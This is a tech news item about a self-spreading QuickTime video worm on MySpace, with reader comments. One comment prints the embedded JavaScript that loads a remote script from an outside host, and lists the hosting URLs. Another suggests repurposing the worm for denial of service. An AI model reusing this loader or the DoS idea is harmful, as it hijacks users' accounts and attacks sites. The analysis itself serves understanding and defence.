New MySpace Exploit

Thanks for a heads up from kaneso on the forums.

A suspect .mov Quicktime video has been appearing on profiles and auto plays. As soon as this video is played it gets added to your MySpace and is spreading a lot.

We encourage users of Neowin to report this site to ensure that those with automatic updates turned on with IE7 will at least get notified this is a fake site.

View: Report Fake Website
View: MySpace Exploit - Neowin Forums

Report a problem with article
Previous Story

Windows Live Local Add-in for Microsoft Office Outlook

Next Story

Free Windows Vista & Office 2007 for US Customers

17 Comments

Commenting is disabled on this article.

Well it look like you you can change the script loction within the mov to point to anywhere that within a image folder on a websever. The script that it point to with in the mov file doues two thing 1. try to change the profile and 2 . send random mail with your account .I been playing an it could easy be re-release against the spam with some tweaking the could be used to send request to the spammer site to DOS

The exploit could pick on any website with a "remember who I am" feature. Seems as it only requires that you have a current cookie keeping you logged in. I also do not see how DropMyRights would solve anything at all. I should ofcourse test but I am pretty sure this could have been done without the mov and just well any website.

I use DropMyRights so I browse without fear on my XP.
For Vista, DropMyRights is built-in (with additional features).

This site can do nothing to my machine.
Be it a Quicktime exploit or a Java exploit I am safe.

The mov file has javascript embedded in it.

The code inside is:
A<java script:void((function(){var e=window.document.createElement('script');e.setAttribute('src','http://www.cake.fi/images/js.js');window.document.body.appendChild(e);})());> T<>


The actual code that does the altering of the myspace is ofcourse here:
http://www.cake.fi/images/js.js

the movie is hosted at
http://www.cake.fi/images/piAF2iuswo.mov
http://almobty.com/css/piAF2iuswo.mov

and random stuff to waste some more lunchtime:
http://www.cake.fi/
http://dotnetsql.com/

Perhaps ring All-solution(http://www.all-solution.com/) and tell them they are hosting the almobty site(it is one of there "1000+ customers", but perhaps they already know. As it is apparently a Saudi Arabia company yet hosted in SanDiego by http://www.aplus.net/

Quote - FrozenSpoon said @ #2
I don't know about anyone else, but I avoid Quicktime like the plauge. Thing still doesn't VSync videos on my computer.

I don't know about anyone else, but I avoid MySpace like the plauge. True, I should support it, since it's owned by Fox News' parent company, but I knew from day 1 that the level of user freedom (with regard to customization) on MySpace would be dangerous... I mean, even if it weren't dangerous.. it's just plain irritatting...

Nothing like trying to read someone's profile when it has a white background, yellow BlInKiNg text, and 5 embedded videos that autoplay when the page loads, along with whatever stupid music the person decided to lace their profile with...

Quote - kokoloko2k3 said @ #2.2

I don't know about anyone else, but I avoid MySpace like the plauge. True, I should support it, since it's owned by Fox News' parent company, but I knew from day 1 that the level of user freedom (with regard to customization) on MySpace would be dangerous... I mean, even if it weren't dangerous.. it's just plain irritatting...

Nothing like trying to read someone's profile when it has a white background, yellow BlInKiNg text, and 5 embedded videos that autoplay when the page loads, along with whatever stupid music the person decided to lace their profile with...

Sounds more like your problem isn't so much with Myspace, but with the fact that you're trying to view pages done by immature people with no style or sense of aesthetics. Who's to blame again? I don't say my tv sucks because I'm too lazy to change the channel...

Quote - kokoloko2k3 said @ #2.2

I don't know about anyone else, but I avoid MySpace like the plauge. True, I should support it, since it's owned by Fox News' parent company, but I knew from day 1 that the level of user freedom (with regard to customization) on MySpace would be dangerous... I mean, even if it weren't dangerous.. it's just plain irritatting...

Nothing like trying to read someone's profile when it has a white background, yellow BlInKiNg text, and 5 embedded videos that autoplay when the page loads, along with whatever stupid music the person decided to lace their profile with...

ok same goes for Windows live spaces, yahoo 360 and all the other scoial networking sites. The problem with those profiles is the kids do that to "act" cool when in realty they arnt. With mine, I try my best to include a theme, background, text etc. so it will all flow together, but still keep it in the "myspace theme" i'd show you mine, but its set to privite due to idiots at school giving me ****....

and as for it being dangerous, it will only become that if you make it become that. If you just talk to your friends, don't acpect requests from strangers then it will be fine. Thats the thing with people, they think my space is all dangerous, but it will only become that if you make it come to that.

Quote - Tech_Dude_5000 said @ #2.4

ok same goes for Windows live spaces, yahoo 360 and all the other scoial networking sites. The problem with those profiles is the kids do that to "act" cool when in realty they arnt. With mine, I try my best to include a theme, background, text etc. so it will all flow together, but still keep it in the "myspace theme" i'd show you mine, but its set to privite due to idiots at school giving me ****....

Well, one social networking site not plagued by the problem I point out is Facebook. I really appreciate the fact that the whole site looks uniform. The problem is not users like you or me. The problem is users like our non-tech friends who have no sense for site design whatsoever... (My sense for site design isn't that good, but I at least I know what looks bad